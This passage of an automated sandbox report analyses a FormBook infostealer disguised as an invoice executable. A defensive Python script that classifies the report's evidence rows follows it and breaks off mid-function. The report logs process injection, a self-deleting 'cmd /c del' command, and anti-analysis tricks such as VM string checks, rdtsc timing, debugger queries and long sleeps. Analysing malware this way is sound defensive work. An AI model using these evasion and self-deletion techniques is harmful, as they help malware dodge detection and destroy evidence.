          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035322AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03521002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035328EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035320A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03486E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03532D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03460D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_035325DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009AE197
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00999E3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00999E40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ADF97
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_00992FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ADFAA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0346B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: String function: 056EB150 appears 35 times
          Source: PT300975-inv.exeBinary or memory string: OriginalFilename vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.345433163.0000000003039000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe4.dll. vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.344599838.0000000000C52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDESdgdhser.dll0 vs PT300975-inv.exe
          Source: PT300975-inv.exe, 00000000.00000002.346817865.00000000055B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PT300975-inv.exe
          Source: PT300975-inv.exeBinary or memory string: OriginalFilenameuse5.exeH vs PT300975-inv.exe
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\PT300975-inv.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT300975-inv.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
          Source: PT300975-inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PT300975-inv.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PT300975-inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PT300975-inv.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\PT300975-inv.exe 'C:\Users\user\Desktop\PT300975-inv.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PT300975-inv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\PT300975-inv.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PT300975-inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PT300975-inv.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: mscorsvw.exe, 00000002.00000002.385641930.00000000057DF000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.605193019.000000000355F000.00000040.00000001.sdmp
          Source: Binary string: mscorsvw.pdb source: ipconfig.exe, 00000004.00000002.605597251.000000000396F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mscorsvw.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.364673964.0000000007AA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE0B8C pushfd ; ret
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3008 pushad ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CEB5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF6C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF02 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041CF0B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0573D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009AD856 push esi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACEB5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF0B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF02 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009ACF6C push eax; ret

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\PT300975-inv.exe | File opened: C:\Users\user\Desktop\PT300975-inv.exe:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEE
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL!:ZONE.IDENTIFIER
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 00000000009998E4 second address: 00000000009998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000000999B5E second address: 0000000000999B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PT300975-inv.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7128 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7144 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6584 | Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 6584 | Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4004 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmp | Binary or memory string: VirtualMachineDetector
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0040ACD0 LdrLoadDll,
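The evidence rows in this section come in two groups: virtualization indicators found in memory (the VMware/NECVMWar device IDs and the Hyper-V resource strings are all read from explorer.exe, the injection target, so they describe the analysis host rather than strings embedded in the sample; only "VirtualMachineDetector" sits in the PT300975-inv.exe image itself) and anti-analysis code in the hollowed mscorsvw.exe (the DebugPort query, the rdtsc timing check, LdrLoadDll, and the long run of `mov eax, dword ptr fs:[00000030h]` reads, which is TEB+0x30, the PEB pointer on 32-bit Windows). A PEB read on its own is not proof of anti-debugging: PEB->BeingDebugged and PEB->NtGlobalFlag are the classic checks, but PEB->Ldr is also how shellcode resolves kernel32/ntdll exports without imports, and FormBook does both. The script below is an added example, not code from the report or from Joe Sandbox. It parses rows of this shape (glued or "|"-separated), assigns each to a technique family, and summarises per process; the classification rules, the ATT&CK IDs and the sleep threshold are my assumptions, and the sample rows are constructed from entries on this page with the long device strings shortened.

```python
"""Triage helper for sandbox evidence rows like the ones listed in this section.

Added example, not part of the Joe Sandbox report. The classification rules,
the ATT&CK mapping and SLEEP_THRESHOLD are assumptions made for illustration.
"""
import re
from collections import Counter, defaultdict
from typing import Optional, Tuple

LABELS = ("Binary or memory string", "Code function", "Process information queried",
          "Process queried", "Thread sleep time", "Last function", "TID")
# Accepts both the glued form ("explorer.exeLast function:") and a " | " column separator.
ROW_RE = re.compile(r"^Source:\s*(?P<source>.*?)\s*\|?\s*(?P<label>"
                    + "|".join(re.escape(lbl) for lbl in LABELS) + r"):\s*(?P<detail>.*)$")
SLEEP_RE = re.compile(r"Thread sleep time:\s*(-?\d+)s")
FUNC_RE = re.compile(r"(\d+_\d+_[0-9A-Fa-f]+)")          # e.g. 2_2_0570C577 (pid_dump_address)
VM_MARKERS = re.compile(r"vmware|necvmwar|virtual_disk|virtual_dvd|hyper-v|vbox|virtualbox|"
                        r"qemu|xen|VirtualMachineDetector", re.I)
SLEEP_THRESHOLD = 30000  # assumed; same unit as the row, mirrors the report's ">= -30000s" cut-off

# Assumed mapping of technique families to ATT&CK technique IDs.
ATTACK = {
    "vm_indicator_string": "T1497.001",   # Virtualization/Sandbox Evasion: System Checks
    "timing_check": "T1497.003",          # Time Based Evasion (rdtsc)
    "long_sleep": "T1497.003",
    "thread_delay": "T1497.003",
    "debug_port_query": "T1622",          # Debugger Evasion (NtQueryInformationProcess/DebugPort)
    "peb_access": "T1622",                # PEB->BeingDebugged / NtGlobalFlag (or PEB->Ldr API walk)
    "process_info_query": "T1622",
    "loader_api": "T1106",                # Native API (LdrLoadDll, LdrGetProcedureAddress)
}
SANDBOX_AWARE = {"vm_indicator_string", "timing_check", "debug_port_query", "long_sleep"}


def parse_row(line: str) -> Optional[Tuple[str, str, str]]:
    """Split one evidence row into (source, label, detail); None if it is not a row."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    return m.group("source").strip(), m.group("label"), m.group("detail").strip()


def process_name(source: str) -> str:
    """'explorer.exe, 00000003....sdmp' -> 'explorer.exe'; a full path -> its basename."""
    return source.split(",", 1)[0].strip().rsplit("\\", 1)[-1]


def classify(line: str, label: str, detail: str) -> Optional[str]:
    """Map one row to a technique family, or None if it is not evasion evidence."""
    sleep = SLEEP_RE.search(line)
    if sleep:
        return "long_sleep" if abs(int(sleep.group(1))) >= SLEEP_THRESHOLD else None
    if label == "Last function" and "Thread delayed" in detail:
        return "thread_delay"
    if label == "Binary or memory string":
        return "vm_indicator_string" if VM_MARKERS.search(detail) else None
    if label == "Code function":
        if "rdtsc" in detail:
            return "timing_check"
        if "fs:[00000030h]" in detail:        # TEB+0x30 holds the PEB pointer on 32-bit Windows
            return "peb_access"
        if re.search(r"\bLdr\w+", detail):    # LdrLoadDll, LdrGetProcedureAddress, ...
            return "loader_api"
        return None
    if label == "Process queried" and "DebugPort" in detail:
        return "debug_port_query"
    if label == "Process information queried":
        return "process_info_query"
    return None


def summarize(rows):
    """Per-process counts, distinct PEB-reading functions, ATT&CK IDs and a sandbox-aware flag."""
    per_proc = defaultdict(Counter)
    peb_funcs = defaultdict(set)
    for line in rows:
        parsed = parse_row(line)
        if parsed is None:
            continue
        source, label, detail = parsed
        cat = classify(line, label, detail)
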